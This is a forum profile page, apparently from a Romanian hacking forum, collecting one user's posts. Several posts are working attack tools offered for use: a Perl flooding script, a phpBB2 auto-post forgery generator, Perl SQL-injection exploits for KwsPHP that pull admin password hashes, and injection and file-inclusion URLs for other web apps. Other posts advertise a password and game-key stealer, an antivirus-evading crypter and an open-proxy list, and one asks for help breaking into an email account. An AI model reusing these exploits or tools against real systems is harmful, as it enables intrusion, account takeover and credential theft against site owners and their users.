Jump to content

Ras

Active Members
  • Posts

    1106
  • Joined

  • Last visited

  • Days Won

    1

Posts posted by Ras

  1. as vrea si eu exploitul ala pls :D flood_ip.pl dak se ofera cnva sa mil dea in pm dak nu vreti altfel plsss ca nu il am :D

    #!/usr/bin/perl

    use IO::Socket::INET;

    print "host: "; chomp($host=<STDIN>);
    print "port: "; chomp($port=<STDIN>);
    print "packets: "; chomp($packets=<STDIN>);

    print "Start flood target -> $host:$port\n";

    $x = 0;

    while ($x < $packets)
    {
    $socket = IO::Socket::INET->new(PeerAddr => $host, PeerPort => $port);
    $x += 1;
    }

    if ($x eq $packets) { print "$packets packet[s] send successfully"; } else { print "There is a problem with packet`s sending"; }

    close($socket);

    search pe google...

    EDIT

    Download Perl: http://rapidshare.com/files/56619845/Perl.rar

  2. ---------------------------------------------------------------
    ____ __________ __ ____ __
    /_ | ____ |__\_____ \ _____/ |_ /_ |/ |_
    | |/ \ | | _(__ <_/ ___\ __\ ______ | \ __\
    | | | \ | |/ \ \___| | /_____/ | || |
    |___|___| /\__| /______ /\___ >__| |___||__|
    \/\______| \/ \/
    ---------------------------------------------------------------

    [url]Http://www.inj3ct-it.org[/url] Staff[at]inj3ct-it[dot]org

    --------------------------------------------------------------

    0day Auto Sender Post phpBB2

    ---------------------------------------------------------------

    # Coded by TuoNuX

    # Description:

    autosendform generator

    ---------------------------------------------------------------

    ---------------------------------------------------------------
    asf.pl
    ---------------------------------------------------------------

    #/usr/bin/perl
    #0day Auto Sender Post phpBB2
    #TuoNuX@hotmail.it
    #[url]http://www.localh0st.altervista.org[/url]
    #[url]http://www.hackingz0ne.altervista.org[/url]
    print q {
    _____________________________________________________________________


    ___ _ _ __ _
    |_ _|_ _ ___ | \ | _ _ \ \/ * 0day Auto Sender Post phpBB2
    | || | |/ . \| || | | \ \ * [email]TuoNuX@hotmail.it[/email]
    |_|`___|\___/|_\_|`___|_/\_\ * [url]http://www.localh0st.altervista.org[/url]
    * [url]http://www.hackingz0ne.altervista.org[/url]
    0day Auto Sender Post phpBB2


    _____________________________________________________________________
    };
    print q {
    [+]Insert host site :
    [-]Indirizzo: };
    $indirizzo = <stdin>;
    chomp($indirizzo);
    print q {
    _____________________________________________________________________
    [+]Insert the forum path (for example /phpBB/) :
    [-]Cartella: };
    $cartella = <stdin>;
    chomp($cartella);
    print q {
    _____________________________________________________________________
    [+]Insert ID section ( number after "?f=" ):
    [-]ID Sezione: };
    $id = <stdin>;
    chomp($id);
    print q {
    _____________________________________________________________________
    [+]Insert Topic Title :
    [-]Titolo: };
    $titolo = <stdin>;
    chomp($titolo);
    print q {
    _____________________________________________________________________
    [+]Insert the body topic :
    [+]Yuc can use also the BB code es: [img=urlimmagine]
    [-]Testo: };
    $testo = <stdin>;
    chomp($testo);
    print q {
    _____________________________________________________________________
    [+]Insert the victim sid , don't write everyone if there isn't it :
    [-]Sid: };
    $sid = <stdin>;
    chomp($sid);
    $sito = "http://$indirizzo$cartella";
    print "\n----------------Riepilogo----------------------\n\n";
    print "Forum => $sito\n";
    print "ID Section => $id\n";
    print "Title => $titolo\n";
    print "Message => $testo\n";
    print "SID => $sid\n\n";
    print "----------------Riepilogo----------------------\n\n";
    print "Enter for continued....";
    <stdin>;
    $m1 = q {<html><head><body><form action="};
    $m2 = "$sito";
    $m3 = q {posting.php" method="post" name="post"><textarea name="message" class="post">};
    $m4 = "$testo";
    $m5 = q {</textarea><input type="hidden" value="};
    $m12 = "\n\nTuoNuX 0day phpBB2 Exploit\n\n\n";
    $m6 = "$titolo";
    $m7 = q {" class="post" tabindex="2" style="width: 450px;" maxlength="60" size="45" name="subject"/><input type="hidden" value="" class="post" maxlength="255" size="50" name="poll_title"/><input type="hidden" value="" class="post" maxlength="255" size="50" name="add_poll_option_text"/><input type="hidden" value="0" class="post" maxlength="3" size="3" name="poll_length"/><input type="hidden" value="Anteprima" class="mainoption" name="preview" tabindex="5"/><input type="hidden" value="Invia" class="mainoption" name="post" tabindex="6" accesskey="s"/><input type="hidden" name="mode" value="newtopic" /><input type="hidden" name="f" value="};
    $m8 = "$id";
    $m9 = q {"> <input type="hidden" name="sid" value="};
    $m10 = "$sid";
    $m11 = q {" /></form><script>document.post.submit()</script></html></head></body>};
    $html = "$m1$m2$m3$m4$m12$m5$m6$m7$m8$m9$m10$m11";
    open ( FILE , ">phpBB20dayexploit.html" ) || die ( "" );
    print FILE $html;
    close ( FILE );
    print q {
    _____________________________________________________________________
    ___ _ _ __ _
    |_ _|_ _ ___ | \ | _ _ \ \/ * 0day Auto Sender Post phpBB2
    | || | |/ . \| || | | \ \ * [email]TuoNuX@hotmail.it[/email]
    |_|`___|\___/|_\_|`___|_/\_\ * [url]http://www.localh0st.altervista.org[/url]
    * [url]http://www.hackingz0ne.altervista.org[/url]

    0day Auto Sender Post phpBB2 Page Saved !!!!...
    Work this script on a webspace and you must visit it to victim.
    Best ReGaRdS FoR localh0st & hackingz0ne
    _____________________________________________________________________

  3. stats module:

    ###################################################
    # Script..........................: KwsPHP ver 1.0 stats Module
    # Script Site..................: [url]http://kws.koogar.org/[/url]
    # Vulnerability...............: Remote SQL injection Exploit
    # Access.........................: Remote
    # level.............................: Dangerous
    # Author..........................: S4mi
    # Contact.........................: S4mi[at]LinuxMail.org
    ####################################################
    #Special Greetz to : Simo64, DrackaNz, Coder212, Iss4m, HarDose, E.chark, r0_0t, ddx39
    #
    ####################################################
    # This Exploit Work Only When magic_quotes_gpc Is OFF
    #
    #Usage : C:\Xploit.pl 127.0.0.1 /KswPHP/ admin
    #Result Screen Shot :
    #+**********************+
    # Connecting ...[OK]
    # Sending Data ...[OK]
    #
    # + Exploit succeed! Getting admin information.
    # + ---------------- +
    # + Username: admin
    # + Password: e10adc3949ba59abbe56e057f20f883e
    ###################################################
    #vuln code : \modules\stats\index.php line ~ 700 - 720
    #~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
    # [code]
    # elseif(isset($aff) && ($aff=="browser"))
    # {
    # if(isset($typenav))
    # {
    # bloc_head("Statistiques des navigateurs ".$liste_navigateurs[$typenav]);
    #
    # $tot_nav=0;
    #
    # $requete=reqmysql("SELECT SUM(hit) as tot FROM `stats` where type='nav' and valeur like '$typenav**%' ORDER BY `type` ASC ");
    #
    # while ($ligne = mysql_fetch_object($requete))
    # {
    # $tot_nav = $ligne->tot;
    # }
    # $requete=reqmysql("SELECT * FROM `stats` where type='nav' and valeur like '$typenav**%' ORDER BY `hit` DESC");
    #

    #########################################################

    #!/usr/bin/perl

    use IO::Socket ;

    &header();

    &usage unless(defined($ARGV[0] && $ARGV[1] && $ARGV[2]));

    $host = $ARGV[0];

    $path = $ARGV[1];

    $user = $ARGV[2];

    syswrite STDOUT ,"\n Connecting ...";

    my $sock = new IO::Socket::INET ( PeerAddr => "$host",PeerPort => "80",Proto => "tcp",);

    die "\n Unable to connect to $host\n" unless($sock);

    syswrite STDOUT, "[OK]";

    $inject = "9999'/**/UNION/**/SELECT/**/0,0,pass,pseudo/**/FROM/**/users/**/WHERE/**/pseudo='$user'/*";

    syswrite STDOUT ,"\n Sending Data ...";

    print $sock "POST $path/index.php?mod=stats&aff=browser&typenav=$inject HTTP/1.1\n";

    print $sock "Host: $host\n";

    print $sock "Referer: $host\n";

    print $sock "Accept-Language: en-us\n";

    print $sock "Content-Type: application/x-www-form-urlencoded\n";

    print $sock "User-Agent: Mozilla/5.0 (BeOS; U; BeOS X.6; en-US; rv:1.7.8) Gecko/20050511 Firefox/1.0.4\n";

    print $sock "Cache-Control: no-cache\n";

    print $sock "Connection: Close\n\n";

    syswrite STDOUT ,"[OK]\n\n";

    while($answer = <$sock>){

    if ($answer =~ /nav_(.*?).png/){

    print "+ Exploit succeed! Getting admin information.\n";

    print "+ ---------------- +\n";

    print "+ Username: $user\n";

    print "+ Password: $1\n";

    print "+ ----Have Fun---- +\n";

    print "+ You don't need to crack the hash password :D\n";

    print "+ Just login with ur owen information and edit the cookies\n";

    }

    }

    sub usage{

    print "\nUsage : perl $0 host /path/ UserName ";

    print "\nExemple : perl $0 www.victim.com /KwsPHP/ admin\n";

    exit(0);

    }

    sub header(){

    print q(

    ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

    # Script......................: KwsPHP ver 1.0 stats Module

    # Script Site.................: http://kws.koogar.org/

    # Vulnerability...............: Remote SQL injection Exploit

    # Access......................: Remote

    # level.......................: Dangerous

    # Author......................: S4mi

    # Contact.....................: S4mi[at]LinuxMail.org

    ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

    );

    }

    member_space module:

    #!/usr/bin/perl

    use LWP::UserAgent;
    use HTTP::Cookies;

    $host = $ARGV[0];
    $User = $ARGV[1];
    $passwd = $ARGV[2];
    $url = "http://".$host;
    $port = "80";

    print q(
    ################################################################
    # Script....................: KwsPHP v1.0 Member_Space Module #
    # Script Site...............: [url]http://kws.koogar.org/[/url] #
    # Vulnerability.............: Remote SQL injection Exploit #
    # Access....................: Remote #
    # level.....................: Dangerous #
    # Author....................: S4mi #
    # Contact...................: S4mi[at]LinuxMail.org #
    # This Exploit Work Only When magic_quotes_gpc Is OFF #
    ################### (C)oded By S4mi ############################

    );


    if (@ARGV < 3) {
    print " # usage : xpl.pl host/path/ User Passwd\n";
    print " # e.g : xpl.pl 127.0.0.1/KwsPHP/ zaz luks\n";
    exit();
    }

    print " [~] User/Password : $User/$passwd \n";
    print " [~] Host : $url \n";

    $xpl = LWP::UserAgent->new() or die;
    $cookie_jar = HTTP::Cookies->new();
    print " [~] Logining ...\n";
    $xpl->cookie_jar( $cookie_jar );
    $login = $xpl->post($url.'index.php',
    Content => [
    "pseudo" => "$User",
    "pass" => "$passwd",
    "submit" => "Se connecter",
    ],);

    $evil0 = "\x39\x39\x39\x39\x39\x27\x2F\x2A\x2A\x2F\x55\x4E\x49\x4F\x4E"
    ."\x2F\x2A\x2A\x2F\x53\x45\x4C\x45\x43\x54\x2F\x2A\x2A\x2F\x6E"
    ."\x75\x6C\x6C\x2C\x63\x6F\x6E\x63\x61\x74\x28\x63\x68\x61\x72"
    ."\x28\x31\x31\x37\x2C\x31\x31\x35\x2C\x31\x30\x31\x2C\x31\x31"
    ."\x34\x2C\x31\x31\x30\x2C\x39\x37\x2C\x31\x30\x39\x2C\x31\x30"
    ."\x31\x2C\x35\x38\x29\x2C\x70\x73\x65\x75\x64\x6F\x2C\x63\x68"
    ."\x61\x72\x28\x31\x32\x37\x29\x29\x2C\x63\x6F\x6E\x63\x61\x74"
    ."\x28\x63\x68\x61\x72\x28\x31\x31\x32\x2C\x39\x37\x2C\x31\x31"
    ."\x35\x2C\x31\x31\x35\x2C\x31\x31\x39\x2C\x31\x31\x31\x2C\x31"
    ."\x31\x34\x2C\x31\x30\x30\x2C\x35\x38\x29\x2C\x70\x61\x73\x73"
    ."\x2C\x63\x68\x61\x72\x28\x31\x32\x37\x29\x29\x2C\x6E\x75\x6C"
    ."\x6C\x2F\x2A\x2A\x2F\x46\x52\x4F\x4D\x2F\x2A\x2A\x2F\x75\x73"
    ."\x65\x72\x73\x2F\x2A\x2A\x2F\x57\x48\x45\x52\x45\x2F\x2A\x2A"
    ."\x2F\x69\x64\x3D\x31\x2F\x2A";

    $offset = "\x65\x73\x70\x61\x63\x65\x5F\x6D\x65\x6D\x62\x72\x65\x26\x61"
    ."\x63\x3D\x63\x61\x72\x6E\x65\x74\x26\x61\x63\x74\x3D\x65\x64"
    ."\x69\x74\x65\x72\x26\x69\x64\x3D";

    $target = $xpl->get($url."index.php?mod=$offset$evil0");



    if($target->as_string =~ /value="username:(.*?"/) {
    $zaz = $1;
    print " [+] Exploit succeed! Getting admin information. \n";
    print " [+] ------------------------------------------- \n";
    }
    if($target->as_string =~ /value="password:(.*?"/) {
    $luks = $1;
    print " [+] UserName : $zaz \n";
    print " [+] Password : $luks \n";
    }
    else {
    print " [-] Exploit Failed ! \n";
    }
    print "\n#############################################################\n";

    login.php:

    ###################################################
    # Script..........................: KwsPHP ver 1.0
    # Script Site..................: [url]http://kws.koogar.org/[/url]
    # Vulnerability...............: login.php Remote SQL injection Exploit
    # Access.........................: Remote
    # level.............................: Dangerous
    # Author..........................: S4mi
    # Contact.........................: S4mi[at]LinuxMail.org
    ####################################################
    #Special Greetz to : Simo64, DrackaNz, Coder212, Iss4m, HarDose, E.chark, r0_0t, ddx39
    #
    ####################################################
    # This Exploit work Only When magic_quotes_gpc Is OFF
    #
    #Usage : C:\Xploit.pl 127.0.0.1 /KswPHP/ admin
    #Result Screen Shot :
    #+**********************+
    # Connecting ...[OK]
    # Sending Data ...[OK]
    #
    # + Exploit succeed! Getting admin information.
    # + ---------------- +
    # + Username: admin
    # + Password: e10adc3949ba59abbe56e057f20f883e
    ###################################################

    #!/usr/bin/perl

    use IO::Socket ;

    &header();

    &usage unless(defined($ARGV[0] && $ARGV[1] && $ARGV[2]));

    $host = $ARGV[0];
    $path = $ARGV[1];
    $user = $ARGV[2];


    syswrite STDOUT ,"\n Connecting ...";

    my $sock = new IO::Socket::INET ( PeerAddr => "$host",PeerPort => "80",Proto => "tcp",);

    die "\n Unable to connect to $host\n" unless($sock);

    syswrite STDOUT, "[OK]";

    $inject = "union%20all%20select%200,pass,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0%20from%20users%20where%20pseudo='$user'/*&pass=ZAZ&verifer=Se%20Loguer";

    syswrite STDOUT ,"\n Sending Data ...";

    print $sock "POST $path/login.php?pseudo=%22$inject HTTP/1.1\n";
    print $sock "Host: $host\n";
    print $sock "Referer: $host\n";
    print $sock "Accept-Language: en-us\n";
    print $sock "Content-Type: application/x-www-form-urlencoded\n";
    print $sock "User-Agent: Mozilla/5.0 (BeOS; U; BeOS X.6; en-US; rv:1.7.8) Gecko/20050511 Firefox/1.0.4\n";
    print $sock "Cache-Control: no-cache\n";
    print $sock "Connection: Close\n\n";

    syswrite STDOUT ,"[OK]\n\n";

    while($answer = <$sock>){

    if ($answer =~ /class="messagelogin">(.*?) /){
    print "+ Exploit succeed! Getting admin information.\n";
    print "+ ----------------------- +\n";
    print "+ Username: $user\n";
    print "+ Password: $1\n";
    print "+ -------Have Fun--------- +\n";
    print "+ You don't need to crack the hash password \n";
    print "+ Just login with ur owen information and edit the cookies\n";
    }
    }

    sub usage{
    print "\nUsage : perl $0 host /path/ UserName ";
    print "\nExemple : perl $0 [url]www.victim.com[/url] /KwsPHP/ admin\n";
    exit(0);
    }
    sub header(){
    print q(
    ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
    # Script......................: KwsPHP ver 1.0
    # Script Site.................: [url]http://kws.koogar.org/[/url]
    # Vulnerability...............: Remote SQL injection Exploit
    # Access......................: Remote
    # level.......................: Dangerous
    # Author......................: S4mi
    # Contact.....................: S4mi[at]LinuxMail.org
    ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
    );
    }

  4. # Chupix CMS 0.2.3 (download.php) Remote File Download Vulnerability

    # P.Script : http://sourceforge.net/project/showfiles.php?group_id=134930

    ################################download.php################################

    Lain:18->57 ->

    ********************************************************************************************************************

    if(isset($_GET['fichier'])){ <--------------XXXX

    *

    // téléchargement du fichier

    *

    $file = "archives/". $_GET['repertoire'] ."/".

    $_GET['fichier'];<--------------XXXX *

    $fichier_txt = "archives/". $_GET['repertoire'] ."/cpt/". $_GET['fichier']

    .".php" *

    $repertoire = "archives/". $_GET['repertoire'] ."/cpt/";

    *

    if(is_file($fichier_txt)){

    *

    $fp = @fopen($fichier_txt, "r"); <--------------XXXX

    *

    $result = fread($fp, filesize ($fichier_txt));

    *

    fclose($fp);

    *

    $result = str_replace("<?php ", "", $result);

    *

    $result = str_replace("?>", "", $result);

    *

    *

    $num = trim($result);

    *

    }else{

    *

    $num = 0;

    *

    }

    *

    $num++;

    *

    *

    $msg = "<?php ". $num ." ?>";

    *

    *

    if(!(is_dir($repertoire))){

    *

    mkdir ($repertoire, 0755);

    *

    }

    *

    *

    $fp = @fopen($fichier_txt, "w+");<--------------XXXX

    *

    if (flock($fp, LOCK_EX)) { // pose un verrou exclusif

    *

    fwrite($fp, $msg);

    *

    flock($fp, LOCK_UN); // lib

  5. Proxy - 12 Sept 2007

    213.170.40.76:8080
    213.170.40.76:80
    213.170.40.76:3128
    91.121.67.145:8080
    193.30.164.3:80
    195.175.37.70:8080
    194.160.198.4:3128
    89.149.164.130:3128
    195.175.37.70:80
    195.175.37.71:8080
    140.247.53.18:80
    213.160.129.52:3128
    75.126.208.243:8080
    66.162.135.6:80
    149.142.90.225:80
    212.25.95.135:80
    200.65.0.25:3128
    209.59.95.52:80
    209.59.95.52:3128
    200.65.0.25:80
    70.97.43.138:11111
    200.196.108.27:3128
    203.69.39.251:80
    203.69.39.250:80
    151.204.42.140:8080
    62.215.195.85:80
    189.20.195.42:3128
    66.98.238.8:3128
    220.225.231.98:3128
    211.115.115.220:8080
    218.108.64.166:80
    217.11.21.4:80
    218.75.68.205:8080
    122.153.25.130:3128
    190.4.8.170:8080
    196.36.198.91:80
    124.138.131.3:3128
    211.0.61.226:3128
    125.246.154.66:3128
    61.166.68.74:80
    122.203.24.194:3128
    203.160.1.50:554
    203.160.1.40:554
    203.160.1.44:553
    200.171.25.62:3128
    203.160.1.48:553
    203.160.1.40:553
    203.160.1.52:554
    203.160.1.52:553
    202.6.158.247:8080
    218.106.254.79:80
    189.4.208.139:3128
    147.243.236.59:8080
    210.212.95.103:8080
    200.193.222.104:3128
    61.6.69.62:3128
    125.246.56.194:3128
    125.243.201.2:8080
    210.212.78.67:8080
    122.153.7.130:3128
    203.99.127.3:3128
    222.88.75.243:3128
    65.160.200.230:8080
    219.139.35.71:3128
    61.139.94.203:3128
    200.148.212.246:3128
    218.8.129.252:8000
    84.22.67.115:80
    203.66.115.133:3128
    222.89.169.73:3128
    122.153.16.66:3128
    125.46.61.39:3128
    80.73.73.178:3128
    221.226.124.121:3128
    212.11.182.2:80
    122.203.17.130:3128
    62.192.142.90:8080
    85.33.42.189:3128
    200.129.43.168:3128
    62.90.252.49:3128
    213.55.94.114:3128
    220.130.112.6:3128
    125.243.140.66:8080
    201.11.156.196:3128
    213.39.246.138:3128
    195.175.37.71:80
    84.254.206.168:3128
    203.160.001.146:554
    189.19.18.36:3128
    201.18.29.130:3128
    203.160.1.44:554
    202.143.112.130:808
    201.245.151.146:80
    222.85.106.20:3128
    189.19.241.229:80
    210.19.150.3:3128
    221.209.18.18:8000
    222.221.254.162:3128
    122.203.155.130:3128
    88.249.250.156:8080
    200.101.81.130:3128
    12.40.36.72:8000
    84.41.249.49:80
    202.170.51.11:8080
    201.116.14.99:8080
    193.110.89.3:8080
    202.83.125.131:3128
    193.255.187.1:8080

  6. Deci pentru unii este simplu sa sparga mailuri sau le sparg doar ca sa isi bata joc de altii, dar cum am spus mai sus mie mi sa furat mailul de catre o persoana care a schimbat parola si mi-a furat un cont de pe un site. Nu stiu cum a facut asta, dupa care a inceput santajul.......eu vreau sa sparg mailul si sa imi recuperez contul...nu ma prea intereseaza mailul in sine ci doar contul si de aceea sunt disperat....daca e cineva capabil ( ma indoiesc ca nu e) si vrea sa ma ajute (putin probabil) il rog din suflet.

    Specific ca eu nu am folosit acel mail decat pentru site-uri si parola contului o stia doar o singura persoana care este de mare incredere pt mine care nu ar avea de ce sa faca chestia asta mai ales ca nu stia parola mailului!!

    venom tu nu mai ai cum sa iti iei contul inapoi decat daca vorbesti cu cel care ti l-a spart.

    cum ti l-a spart? te-ai logat pe o pagina falsa de yahoo? ai primit vreun fisier .exe de la cineva?

    sa va intre si voua in cap ca nicio parola de yahoo nu se sparge direct (adica pui id si poc iti da pass)

  7. unlu7.png

    PW Messanger Packet

    -MSN Messenger

    -Windows Messenger

    -Yahoo Messenger (Version 5.x und 6.x)

    -Google Talk

    -ICQ Lite 4.x/5.x/2003

    -AOL Instand Messenger/Netscape 7

    -Trilian

    -Miranda

    -GAIM

    PW Mail Packet

    -Outlook Express

    -Microsoft Outlook 2000/XP/2003

    -IncrediMail

    -Mozilla Thunderbird

    -Netscape 6.x/7.x

    -Group Mail Free, Gmail

    -Yahoo Mail

    -Hotmail / MSN Mail

    -Eudora

    Protected Storage PW Packet

    -Outlook Passwords

    -Auto Completet password in IE

    -Password protected sites in IE

    -MSN Explorer Passwords

    Steam PW Packet

    -Steam Username

    -Steam Password

    -Steam game-path

    Game Key Stealer

    -UT 2003/2004

    -Battlefield 1942 / Road to Rome / Scret Weapons / Vietnam

    -Need for Speed Hot Pursuit 2

    -James Bond 007 Nightfire

    -Command & Conquer Generals / Zero Hour

    -SimCity 4

    -Call of Duty 2 / United Offensive / 1

    -SWAT 4 / EXP

    Windows Info Packet

    Windows Username, Windows Computername ect. ect.

    Download: http://rapidshare.com/files/54896185/UnLimited_PW_-_Stealer_0.40.rar

  8. pwwq1.jpg

    Bifrost server Resultaat: 0/32 (0%)

    AhnLab-V3 2007.9.8.0 2007.09.07 -
    AntiVir 7.6.0.5 2007.09.09 -
    Authentium 4.93.8 2007.09.09 -
    Avast 4.7.1043.0 2007.09.08 -
    AVG 7.5.0.485 2007.09.09 -
    BitDefender 7.2 2007.09.09 -
    CAT-QuickHeal 9.00 2007.09.08 -
    ClamAV 0.91.2 2007.09.09 -
    DrWeb 4.33 2007.09.09 -
    eSafe 7.0.15.0 2007.09.04 -
    eTrust-Vet 31.1.5119 2007.09.08 -
    Ewido 4.0 2007.09.09 -
    FileAdvisor 1 2007.09.10 -
    Fortinet 3.11.0.0 2007.09.08 -
    F-Prot 4.3.2.48 2007.09.09 -
    F-Secure 6.70.13030.0 2007.09.09 -
    Ikarus T3.1.1.12 2007.09.09 -
    Kaspersky 4.0.2.24 2007.09.09 -
    McAfee 5115 2007.09.07 -
    Microsoft 1.2803 2007.09.09 -
    NOD32v2 2516 2007.09.09 -
    Norman 5.80.02 2007.09.07 -
    Panda 9.0.0.4 2007.09.09 -
    Prevx1 V2 2007.09.10 -
    Rising 19.39.62.00 2007.09.09 -
    Sophos 4.21.0 2007.09.09 -
    Sunbelt 2.2.907.0 2007.09.07 -
    Symantec 10 2007.09.09 -
    TheHacker 6.1.10.182 2007.09.08 -
    VBA32 3.12.2.4 2007.09.09 -
    VirusBuster 4.3.26:9 2007.09.09 -
    Webwasher-Gateway 6.0.1 2007.09.09 -
    Extra informatie
    File size: 22967 bytes
    MD5: e1d330c5a0dcb7f5095937fb13eb6b7f
    SHA1: 3526e906354b07527b218709b2496868760de140

    First button: add

    The second button: delete

    The third button: new project

    The fourth button: about

    Download: http://rapidshare.com/files/54787756/PowerCrypt_v2.0.rar

  9. ## Owner : Pr0T3cT10n 
    ## Email : [email]Pr0T3cT10n@Gmail.Com[/email]
    ## Homepage : [url]www.kamikaz-team.com[/url]
    ## Script site : [url]http://www.phpnuke.org[/url]
    ## Script download : [url]http://www.spchat.org/modules.php?name=Downloads&d_op=getit&lid=19[/url]
    ## Script name : PHP-Nuke module(SPChat)
    ## Version : All
    ## Type : SQL Injection
    ## D0rk : inurl:name=SPChat

    ## Description :
    ## Pull out user details from the database

    ## Vuln :
    ## [url]http://www.example.com/modules.php?op=modload&name=SPChat&file=chooser&youruid=[/url][SQL Injection]
    ## [url]http://www.example.com/modules.php?op=modload&name=SPChat&file=chooser&youruid=0+UNION+SELECT+pwd,2,3,4,5,6,7,8+FROM+nuke_authors+LIMIT+0,1[/url]

    ## NOTE :
    ## You need to be a regular user

    ## Thanks to some friend of mine..

  10. ######################################################################## 
    # RW::Download v2.0.3 lite - Remote SQL Injection
    # Vendor : [url]http://www.rwscripts.com/[/url]
    # Ditemukan oleh : k1tk4t - k1tk4t[4t]newhack.org
    # Lokasi : Indonesia -- #newhack[dot]org @ irc.dal.net
    # Dork : "Powered by RW::Download v2.0.3 lite"
    #################################################

    [url]http://localhost/UPLOAD/index.php?url=&dlid=-9%20UNION%20SELECT%20null,null,null,null,username,null,null,null,null,null,null,null,null,password,null,null,null,null%20from%20dl_users/*[/url]

    http://localhost/UPLOAD/index.php?url=&cid=-9%20UNION%20SELECT%20null,null,concat(username,0x3a,password),null,null,null%20from%20dl_users/*

  11. --------------------------------------------------------------- 
    ____ __________ __ ____ __
    /_ | ____ |__\_____ \ _____/ |_ /_ |/ |_
    | |/ \ | | _(__ <_/ ___\ __\ ______ | \ __\
    | | | \ | |/ \ \___| | /_____/ | || |
    |___|___| /\__| /______ /\___ >__| |___||__|
    \/\______| \/ \/
    ---------------------------------------------------------------
    [url]Http://www.inj3ct-it.org[/url] Staff[at]inj3ct-it[dot]org
    ---------------------------------------------------------------
    Multiple Remote File Inclusion Vulnerability
    ---------------------------------------------------------------
    # Author: MhZ91 [email]nobody.91@hotmail.it[/email]
    # Download Script: [url]http://sourceforge.net/projects/offl/[/url] Online Fantasy Football League 0.2.6
    # Exploit:
    # [url]http://[target]/[/url][path]/lib/functions.php?DOC_ROOT=[Shell]
    # [url]http://[target]/[/url][path]/lib/header.php?DOC_ROOT=[Shell]
    ---------------------------------------------------------------

  12. Here is a 0day sql injection for phpmyforum, admin hash disclosure. You need to register and post a message to make it work. This forum is completely in german, so it's a little hard to work with (if you're ignorant like me and don't know any other langs). 

    1. Register at forum.

    2. Post a message in any forum.

    3. Open the url, replacing "24" with the id of your post.
    Codice:
    http://target/editpost.php?id=24+union+select+concat(char(58,58,5Cool,id,char(58,58,5Cool,pass,char(58,58,5 Cool),id+from+pmf_user+where+group_id=1+order+by+1+asc+/*

    4. The id and md5 hash should appear in the textarea on this page. It will look like:
    :::1:::21232f297a57a5a743894a0e4a801fc3:::

×
×
  • Create New...